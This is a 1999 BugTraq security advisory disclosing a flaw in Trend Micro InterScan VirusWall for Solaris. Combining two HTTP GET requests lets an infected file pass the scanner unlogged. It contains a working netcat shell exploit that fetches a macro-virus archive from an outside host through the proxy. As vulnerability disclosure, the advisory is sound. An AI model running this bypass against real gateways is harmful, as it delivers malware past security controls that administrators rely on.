From unicorn@BLACKHATS.ORG Thu Feb 25 09:13:30 1999 From: The Unicorn To: BUGTRAQ@netspace.org Date: Mon, 22 Feb 1999 21:31:51 +0100 Subject: BlackHats Advisory -- InterScan VirusWall BlackHats Security Advisory Release date: February 22, 1999 Application: InterScan Viruswall for Solaris Severity: Any user can download binaries and virus infected files though the VirusWall Author(s): s10@blackhats.org, unicorn@blackhats.org --- Overview : --- InterScan VirusWall is part of Trend Micro's integrated family of virus protection products that covers every access point - Internet gateways, groupware, e-mail and intranet servers, LAN servers, and desktops. InterScan VirusWall scans inbound and outbound SMTP mail and attachments, FTP and HTTP traffic in real time. It automatically cleans infected files and detects malicious Java applets and ActiveX objects. When two HTML GET commands are combined in one request, of wich the former points to a non-scanned file like a graphic image (i.e. a GIF file) and the latter to a possibly infected binary or macro file, both of the files are passed to the user requesting the data without any warning or logging by the VirusWall. We found that this combination was sometimes generated by well-known web browsers like Netscape Communicator and Microsoft Internet Explorer during normal use. We informed Trend Micro of this vulnerability more than three weeks ago. We fully described the problem to Trend Engineering and included an exploit similar to the one described below and all traffic between the browser and VirusWall, but did not receive a fix for this problem. The explanation received was that they were unable to reproduce it on their systems. Since these systems are used to protect people behind (expensive) firewall configurations against virus infection, we decided to make, at least, the administrators of these systems aware of this exploit that can be used by users behind an InterScan VirusWall configuration to circumvent the implemented security policy. --- Affected systems: --- InterScan Viruswall for Solaris Implementations of InterScan VirusWall on other platforms are likely to be vulnerable, but are not tested since we do not have them available --- Workarounds/Fixes: --- We have not yet received a fix from Trend Micro. It might be possible to close this hole by scanning *ALL* data passed in HTTP traffic, but this will have a negative influence on the throughput of the complete firewall configuration. --- Example: --- We developed the following exploit that requests two files in one message. The first one is a simple graphic file (in this case form the Trend Micro web-site) and the second one is a file containing a well known macro-virus, which would normally be detected and removed by the product. Using the netcat tool we send this combined request out to the world using the VirusWall as a proxy-server. The information received back is stored in a file. When later examining the file we find both the graphic and the virus infected contents requested. Looking through the logfiles no trace is found of this file seeping through the hole. #!/bin/sh echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0 Referer: http://www.antivirus.com/index.html Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.5 [en] (WinNT; I) Host: www.antivirus.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg image/png Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0 Referer: http://sourceofkaos.com/homes/knowdeth/index.html Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.5 [en] (WinNT; I) Host: sourceofkaos.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 " | nc viruswall 80 > the.results Changing the second part of this "code" will enable downloading any information through the Trend Micro InterScan VirusWall. Probably because the product only acts on the first GET command in a message, while retrieving all information requested. --- Further Study: --- Further study of this vulnerability may focus on FTP and SMTP traffic and the detection of malicious Java applets and ActiveX objects. Ciao, Unicorn. -- ======= _ __,;;;/ TimeWaster ================================================ ,;( )_, )~\| A Truly Wise Man Never Plays ;; // `--; Leapfrog With A Unicorn... ==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======